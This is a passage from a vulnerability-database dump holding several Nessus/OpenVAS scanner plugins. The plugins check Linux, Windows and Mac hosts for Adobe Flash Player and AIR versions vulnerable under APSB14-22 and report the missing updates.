script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Gentoo Linux Local Security Checks 
GLSA 201411-06\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Gentoo Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\n\nif((res=ispkgvuln(pkg:\"www-plugins/adobe-flash\", unaffected: make_list(\"ge 11.2.202.418\"), vulnerable: make_list(\"lt 11.2.202.418\"))) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2019-11-01T03:00:42", "bulletinFamily": "scanner", "description": " - Security update to 11.2.202.411 (bnc#901334) :\n\n - APSB14-22, CVE-2014-0569 (ZDI-14-365), CVE-2014-0564,\n CVE-2014-0558", "modified": "2019-11-02T00:00:00", "id": "OPENSUSE-2014-603.NASL", "href": "https://www.tenable.com/plugins/nessus/78719", "published": "2014-10-29T00:00:00", "title": "openSUSE Security Update : flash-player (openSUSE-SU-2014:1329-1)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2014-603.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(78719);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2018/11/10 11:50:02\");\n\n script_cve_id(\"CVE-2014-0558\", \"CVE-2014-0564\", \"CVE-2014-0569\");\n\n script_name(english:\"openSUSE Security Update : flash-player (openSUSE-SU-2014:1329-1)\");\n script_summary(english:\"Check for the openSUSE-2014-603 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\" - Security update to 11.2.202.411 (bnc#901334) :\n\n - APSB14-22, CVE-2014-0569 (ZDI-14-365), CVE-2014-0564,\n CVE-2014-0558\"\n 
);\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=901334\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2014-10/msg00033.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected flash-player packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player casi32 Integer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:flash-player\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:flash-player-gnome\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:flash-player-kde4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:12.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE12\\.3|SUSE13\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"12.3 / 13.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE12.3\", reference:\"flash-player-11.2.202.411-2.96.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"flash-player-gnome-11.2.202.411-2.96.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"flash-player-kde4-11.2.202.411-2.96.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"flash-player-11.2.202.411-70.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"flash-player-gnome-11.2.202.411-70.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"flash-player-kde4-11.2.202.411-70.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"flash-player / flash-player-gnome / flash-player-kde4\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-01T03:20:54", 
"bulletinFamily": "scanner", "description": "An updated Adobe Flash Player package that fixes multiple security\nissues is now available for Red Hat Enterprise Linux 5 and 6\nSupplementary.\n\nRed Hat Product Security has rated this update as having Critical\nsecurity impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nThe flash-plugin package contains a Mozilla Firefox compatible Adobe\nFlash Player web browser plug-in.\n\nThis update fixes multiple vulnerabilities in Adobe Flash Player.\nThese vulnerabilities are detailed in the Adobe Security Bulletin\nAPSB14-22, listed in the References section.\n\nMultiple flaws were found in the way flash-plugin displayed certain\nSWF content. An attacker could use these flaws to create a specially\ncrafted SWF file that would cause flash-plugin to crash or,\npotentially, execute arbitrary code when the victim loaded a page\ncontaining the malicious SWF content. (CVE-2014-0558, CVE-2014-0564,\nCVE-2014-0569)\n\nAll users of Adobe Flash Player should install this updated package,\nwhich upgrades Flash Player to version 11.2.202.411.", "modified": "2019-11-02T00:00:00", "id": "REDHAT-RHSA-2014-1648.NASL", "href": "https://www.tenable.com/plugins/nessus/78503", "published": "2014-10-16T00:00:00", "title": "RHEL 5 / 6 : flash-plugin (RHSA-2014:1648)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2014:1648. 
The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(78503);\n script_version(\"1.28\");\n script_cvs_date(\"Date: 2019/10/24 15:35:39\");\n\n script_cve_id(\"CVE-2014-0558\", \"CVE-2014-0564\", \"CVE-2014-0569\");\n script_bugtraq_id(70437, 70441, 70442);\n script_xref(name:\"RHSA\", value:\"2014:1648\");\n\n script_name(english:\"RHEL 5 / 6 : flash-plugin (RHSA-2014:1648)\");\n script_summary(english:\"Checks the rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An updated Adobe Flash Player package that fixes multiple security\nissues is now available for Red Hat Enterprise Linux 5 and 6\nSupplementary.\n\nRed Hat Product Security has rated this update as having Critical\nsecurity impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nThe flash-plugin package contains a Mozilla Firefox compatible Adobe\nFlash Player web browser plug-in.\n\nThis update fixes multiple vulnerabilities in Adobe Flash Player.\nThese vulnerabilities are detailed in the Adobe Security Bulletin\nAPSB14-22, listed in the References section.\n\nMultiple flaws were found in the way flash-plugin displayed certain\nSWF content. An attacker could use these flaws to create a specially\ncrafted SWF file that would cause flash-plugin to crash or,\npotentially, execute arbitrary code when the victim loaded a page\ncontaining the malicious SWF content. 
(CVE-2014-0558, CVE-2014-0564,\nCVE-2014-0569)\n\nAll users of Adobe Flash Player should install this updated package,\nwhich upgrades Flash Player to version 11.2.202.411.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://helpx.adobe.com/security/products/flash-player/apsb14-22.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2014:1648\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-0558\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-0564\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-0569\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected flash-plugin package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player casi32 Integer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:flash-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.6\");\n\n 
script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/10/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/16\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^(5|6)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x / 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2014:1648\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", reference:\"flash-plugin-11.2.202.411-1.el5\")) flag++;\n\n\n if (rpm_check(release:\"RHEL6\", reference:\"flash-plugin-11.2.202.411-1.el6\")) flag++;\n\n\n if (flag)\n {\n flash_plugin_caveat = '\\n' +\n 'NOTE: This vulnerability check only applies to RedHat released\\n' +\n 'versions of the flash-plugin package. 
This check does not apply to\\n' +\n 'Adobe released versions of the flash-plugin package, which are\\n' +\n 'versioned similarly and cause collisions in detection.\\n\\n' +\n\n 'If you are certain you are running the Adobe released package of\\n' +\n 'flash-plugin and are running a version of it equal or higher to the\\n' +\n 'RedHat version listed above then you can consider this a false\\n' +\n 'positive.\\n';\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat() + flash_plugin_caveat\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"flash-plugin\");\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-03T12:17:53", "bulletinFamily": "scanner", "description": "This update fixes multiple code execution vulnerabilities in\nflash-player (APSB14-22). CVE-2014-0564 / CVE-2014-0558 /\nCVE-2014-0569 have been assigned to this issue.", "modified": "2019-11-02T00:00:00", "id": "SUSE_11_FLASH-PLAYER-141020.NASL", "href": "https://www.tenable.com/plugins/nessus/78885", "published": "2014-11-06T00:00:00", "title": "SuSE 11.3 Security Update : flash-player (SAT Patch Number 9898)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. 
The text itself is\n# copyright (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(78885);\n script_version(\"$Revision: 1.5 $\");\n script_cvs_date(\"$Date: 2015/04/13 14:33:57 $\");\n\n script_cve_id(\"CVE-2014-0558\", \"CVE-2014-0564\", \"CVE-2014-0569\");\n\n script_name(english:\"SuSE 11.3 Security Update : flash-player (SAT Patch Number 9898)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixes multiple code execution vulnerabilities in\nflash-player (APSB14-22). CVE-2014-0564 / CVE-2014-0558 /\nCVE-2014-0569 have been assigned to this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=901334\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2014-0558.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2014-0564.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2014-0569.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply SAT patch number 9898.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player casi32 Integer Overflow');\n 
script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:flash-player\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:flash-player-gnome\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:flash-player-kde4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/11/06\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2015 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\npl = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(pl) || int(pl) != 3) audit(AUDIT_OS_NOT, \"SuSE 11.3\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"flash-player-11.2.202.411-0.3.1\")) flag++;\nif (rpm_check(release:\"SLED11\", 
sp:3, cpu:\"i586\", reference:\"flash-player-gnome-11.2.202.411-0.3.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"flash-player-kde4-11.2.202.411-0.3.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"flash-player-11.2.202.411-0.3.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"flash-player-gnome-11.2.202.411-0.3.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"flash-player-kde4-11.2.202.411-0.3.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-26T10:19:05", "bulletinFamily": "scanner", "description": "According to its version, the installation of Adobe AIR on the remote\nWindows host is equal or prior to 15.0.0.249. It is, therefore,\naffected by the following vulnerabilities :\n\n - Multiple memory corruption issues due to improperly\n sanitized user-supplied input allow arbitrary code\n execution. (CVE-2014-0564, CVE-2014-0558)\n\n - An integer overflow issue due to improperly sanitized\n user-supplied input that allows arbitrary code\n execution. 
(CVE-2014-0569)\n\n - An arbitrary code execution vulnerability due to the\n handling of a dereferenced memory pointer.\n (CVE-2014-8439)", "modified": "2019-11-02T00:00:00", "id": "ADOBE_AIR_APSB14-22.NASL", "href": "https://www.tenable.com/plugins/nessus/78440", "published": "2014-10-15T00:00:00", "title": "Adobe AIR <= AIR 15.0.0.249 Multiple Vulnerabilities (APSB14-22)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(78440);\n script_version(\"1.14\");\n script_cvs_date(\"Date: 2019/11/25\");\n\n script_cve_id(\n \"CVE-2014-0558\",\n \"CVE-2014-0564\",\n \"CVE-2014-0569\",\n \"CVE-2014-8439\"\n );\n script_bugtraq_id(\n 70437,\n 70441,\n 70442,\n 71289\n );\n\n script_name(english:\"Adobe AIR <= AIR 15.0.0.249 Multiple Vulnerabilities (APSB14-22)\");\n script_summary(english:\"Checks the version gathered by local check.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host contains a version of Adobe AIR that is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version, the installation of Adobe AIR on the remote\nWindows host is equal or prior to 15.0.0.249. It is, therefore,\naffected by the following vulnerabilities :\n\n - Multiple memory corruption issues due to improperly\n sanitized user-supplied input allow arbitrary code\n execution. (CVE-2014-0564, CVE-2014-0558)\n\n - An integer overflow issue due to improperly sanitized\n user-supplied input that allows arbitrary code\n execution. 
(CVE-2014-0569)\n\n - An arbitrary code execution vulnerability due to the\n handling of a dereferenced memory pointer.\n (CVE-2014-8439)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb14-22.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe AIR 15.0.0.293 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-8439\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player casi32 Integer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/10/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:air\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"adobe_air_installed.nasl\");\n script_require_keys(\"SMB/Adobe_AIR/Version\", \"SMB/Adobe_AIR/Path\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nversion = get_kb_item_or_exit(\"SMB/Adobe_AIR/Version\");\npath = get_kb_item_or_exit(\"SMB/Adobe_AIR/Path\");\n\nversion_ui = get_kb_item(\"SMB/Adobe_AIR/Version_UI\");\nif (isnull(version_ui)) version_report = version;\nelse version_report = version_ui + ' (' + version + ')';\n\ncutoff_version = '15.0.0.249';\nfix = '15.0.0.293';\nfix_ui = '15.0';\n\nif (ver_compare(ver:version, fix:cutoff_version) <= 0)\n{\n port = get_kb_item(\"SMB/transport\");\n if (!port) port = 445;\n\n if (report_verbosity > 0)\n {\n report =\n '\\n Path : ' + path +\n '\\n Installed version : ' + version_report +\n '\\n Fixed version : ' + fix_ui + \" (\" + fix + ')' + \n '\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n exit(0);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, \"Adobe AIR\", version_report, path);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-26T11:19:45", "bulletinFamily": "scanner", "description": "According to its version, the installation of Adobe AIR on the remote\nMac OS X host is equal or prior to 15.0.0.249. It is, therefore,\naffected by the following vulnerabilities :\n\n - Multiple memory corruption issues due to improperly\n sanitized user-supplied input allow arbitrary code\n execution. (CVE-2014-0564, CVE-2014-0558)\n\n - An integer overflow issue due to improperly sanitized\n user-supplied input that allows arbitrary code\n execution. 
(CVE-2014-0569)\n\n - An arbitrary code execution vulnerability due to the\n handling of a dereferenced memory pointer.\n (CVE-2014-8439)", "modified": "2019-11-02T00:00:00", "id": "MACOSX_ADOBE_AIR_15_0_0_293.NASL", "href": "https://www.tenable.com/plugins/nessus/78442", "published": "2014-10-15T00:00:00", "title": "Adobe AIR for Mac <= 15.0.0.249 Multiple Vulnerabilities (APSB14-21)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(78442);\n script_version(\"1.14\");\n script_cvs_date(\"Date: 2019/11/25\");\n\n script_cve_id(\n \"CVE-2014-0558\",\n \"CVE-2014-0564\",\n \"CVE-2014-0569\",\n \"CVE-2014-8439\"\n );\n script_bugtraq_id(\n 70437,\n 70441,\n 70442,\n 71289\n );\n\n script_name(english:\"Adobe AIR for Mac <= 15.0.0.249 Multiple Vulnerabilities (APSB14-21)\");\n script_summary(english:\"Checks the version gathered by local check.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Mac OS X host contains a version of Adobe AIR that is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version, the installation of Adobe AIR on the remote\nMac OS X host is equal or prior to 15.0.0.249. It is, therefore,\naffected by the following vulnerabilities :\n\n - Multiple memory corruption issues due to improperly\n sanitized user-supplied input allow arbitrary code\n execution. (CVE-2014-0564, CVE-2014-0558)\n\n - An integer overflow issue due to improperly sanitized\n user-supplied input that allows arbitrary code\n execution. 
(CVE-2014-0569)\n\n - An arbitrary code execution vulnerability due to the\n handling of a dereferenced memory pointer.\n (CVE-2014-8439)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb14-22.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe AIR 15.0.0.293 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-8439\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player casi32 Integer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/10/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:air\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. 
